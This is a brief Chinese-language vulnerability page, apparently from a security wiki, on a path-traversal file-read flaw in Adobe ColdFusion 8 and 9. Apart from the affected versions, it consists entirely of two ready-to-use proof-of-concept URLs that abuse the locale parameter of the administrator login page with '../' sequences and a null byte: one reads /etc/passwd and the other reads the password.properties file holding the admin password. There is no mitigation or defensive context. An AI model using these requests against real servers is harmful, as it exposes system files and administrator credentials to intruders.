跳转至

Adobe ColdFusion 文件读取漏洞

最后更新于:2020-09-21 13:01:58

漏洞范围

Adobe ColdFusion 8、9

漏洞POC

读取etc/passwd

http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

读取后台管理员密码

http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en